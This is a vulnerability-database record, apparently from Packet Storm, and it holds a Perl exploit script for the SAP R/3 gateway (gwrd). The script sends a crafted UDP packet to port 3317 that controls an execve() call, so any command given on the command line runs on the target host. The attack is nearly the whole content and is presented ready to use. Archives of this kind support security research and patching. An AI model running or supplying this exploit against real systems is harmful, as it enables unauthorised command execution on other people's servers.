{"type": "packetstorm", "published": "2006-11-14T00:00:00", "reporter": "Nicob", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8e8f071086b4620b62c0c53051c1cd1f"}, {"key": "modified", "hash": "faf4af2affe572d4955d2a8f50774e8f"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "faf4af2affe572d4955d2a8f50774e8f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3aafa0182809c628bb39aeaad27b7636"}, {"key": "sourceData", "hash": "e3da0a6aa70f407c0f400fea19c1e868"}, {"key": "sourceHref", "hash": "254c3047b61c1475a534a6dc6963e87a"}, {"key": "title", "hash": "e3538df13da8457ecf9f82c65c6f7469"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl -w \nuse IO::Socket; \n \n# Unix version of the FX SAP R/3 gwrd vuln. \n# \n# We partially control a call to excve() made by lnaxdm/sapsys \n# Easily exploitable with local access \n# Could be done remotely under some conditions \n# \n# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code) \n# 2005, Nicob <nicob@nicob.net> (Unix version) \n# \n \n$|=1; \n \ndie \"Give filename\" unless ($command=shift); \ndie \"Give arg1\" unless ($param1=shift); \ndie \"Give arg3\" unless ($param3=shift); \ndie \"Arg1 too long\" if (length($param1) > 8); \ndie \"Arg3 too long\" if (length($param3) > 8); \ndie \"Give host\" unless ($host=shift); \n \n$port=\"3317\" unless ($port=shift); \n \n$request = \n\"\\x01\". \n\"\\x02\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n\"BBBBBBBBBB\". \n \n# Second arg to execve() \n# 8 chars long \n$param1. \n\" \" x (8 - length($param1)). \n \n\"_0_0_0_0_0_\". \n \n# Fourth arg to execve() \n# 8 chars long \n$param3. \n\" \" x (8 - length($param3)). \n \n\"_1_1_1_1_1__2_2_2_2_2\". \n \n# First arg to execve() \n# Unlimted length, end with %00 \n$command.\"\\x00\"; \n \n&send_UDP($host,$port); \n \nexit 0; \n \nsub send_UDP { \nmy $remote; \nmy $rline; \nmy $dest; \nmy $port; \n \n($dest,$port) = @_; \n \n$remote = \nIO::Socket::INET->new(Proto=>\"udp\",PeerAddr=>$dest,PeerPort=>\"$port\",); \nunless ($remote) { die \"cannot get socket for $dest\" } \n$remote->autoflush(1); \nprint $remote $request; \n \nclose $remote; \n} \n`\n", "viewCount": 1, "history": [], "lastseen": "2016-11-03T10:19:25", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/52024/r3mote_unix_UDPexec.pl.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/52024/r3mote_unix_UDPexec.pl.txt", "title": "r3mote_unix_UDPexec.pl.txt", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:19:25"}, "dependencies": {"references": [], "modified": "2016-11-03T10:19:25"}, "vulnersScore": -0.3}, "references": [], "id": "PACKETSTORM:52024", "hash": "60af39e0b8bbf0d0036af1d67bbc990e5b3d34e7ec68a682e110ca8d66fd7666", "edition": 1, "cvelist": [], "modified": "2006-11-14T00:00:00", "description": ""}

{}